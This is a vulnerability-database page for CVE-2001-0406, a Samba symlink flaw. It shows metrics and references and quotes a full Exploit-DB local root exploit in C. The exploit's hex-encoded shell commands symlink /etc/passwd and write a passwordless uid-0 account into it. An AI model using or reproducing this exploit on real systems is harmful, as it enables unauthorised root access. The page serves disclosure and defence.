CVE-2001-0406 : Detail

CVE-2001-0406

0.09%V3
Local
2001-05-24
02h00 +00:00
2005-05-08
22h00 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Samba before 2.2.0 allows local attackers to overwrite arbitrary files via a symlink attack using (1) a printer queue query, (2) the more command in smbclient, or (3) the mput command in smbclient.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 2.1 AV:L/AC:L/Au:N/C:N/I:P/A:N nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 20776

Publication date : 2001-04-16 22h00 +00:00
Author : Gabriel Maggiotti
EDB Verified : Yes

// source: https://www.securityfocus.com/bid/2617/info Samba is a flexible file sharing packaged maintained by the Samba development group. It provides interoperatability between UNIX and Microsoft Windows systems, permitting the sharing of files and printing services. A problem in the package could make it possible to deny service to legitimate users. Due to the insecure creation of files in the /tmp file system, it is possible for a user to create a symbolic link to other files owned by privileged users in the system, such as system device files, and write data to the files. This vulnerability makes it possible for a local user to deny service to other users of the system, and potentially gain elevated privileges. /* * Samba Server r00t exploit * * Scope: Local (this exploit) and posible remote if conditions are given. * Vuln: * RedHat 5.1 * RedHat 5.2 * RedHat 6.0 * RedHat 6.1 * RedHat 6.2 * RedHat 7.0 * RedHat 7.1 * I don't know if other versions are vulnerable too. * * Run this exploit and then take a look at your passwd file. * Run: ./samba-exp user * * Author: Gabriel Maggiotti * Email: gmaggiot@ciudad.com.ar * Webpage: http://qb0x.net */ #include <stdio.h> #include <string.h> int main(int argc,char *argv[]) { char inject1[]= "\x2f\x62\x69\x6e\x2f\x72\x6d\x20\x2d\x72\x66\x20\x2f" "\x74\x6d\x70\x2f\x78\x2e\x6c\x6f\x67"; char inject2[]= "\x2f\x62\x69\x6e\x2f\x6c\x6e\x20\x2d\x73\x20\x2f\x65" "\x74\x63\x2f\x70\x61\x73\x73\x77\x64\x20\x2f\x74\x6d" "\x70\x2f\x78\x2e\x6c\x6f\x67"; char inject3a[100]= "\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x73\x6d\x62\x63" "\x6c\x69\x65\x6e\x74\x20\x2f\x2f\x6c\x6f\x63\x61\x6c" "\x68\x6f\x73\x74\x2f\x22\xa\xa"; char inject3b[]= "\x3a\x3a\x30\x3a\x30\x3a\x3a\x2f\x3a\x2f\x62\x69\x6e" "\x2f\x73\x68\x5c\x6e\x22\x20\x2d\x6e\x20\x2e\x2e\x2f" "\x2e\x2e\x2f\x2e\x2e\x2f\x74\x6d\x70\x2f\x78\x20\x2d" "\x4e\xa"; if(argc!=2){ fprintf(stderr,"usage: %s <user>\n",*argv); return 1; } strcat(inject3a,argv[1]); strcat(inject3a,inject3b); system(inject1, 0); system(inject2, 0); system(inject3a, 0); return 0; }

Products Mentioned

Configuraton 0

Samba>>Samba >> Version To (including) 2.0.7

References

http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio=000395
Tags : vendor-advisory, x_refsource_CONECTIVA
http://www.kb.cert.org/vuls/id/670568
Tags : third-party-advisory, x_refsource_CERT-VN
http://www.securityfocus.com/bid/2617
Tags : vdb-entry, x_refsource_BID
http://www.debian.org/security/2001/dsa-048
Tags : vendor-advisory, x_refsource_DEBIAN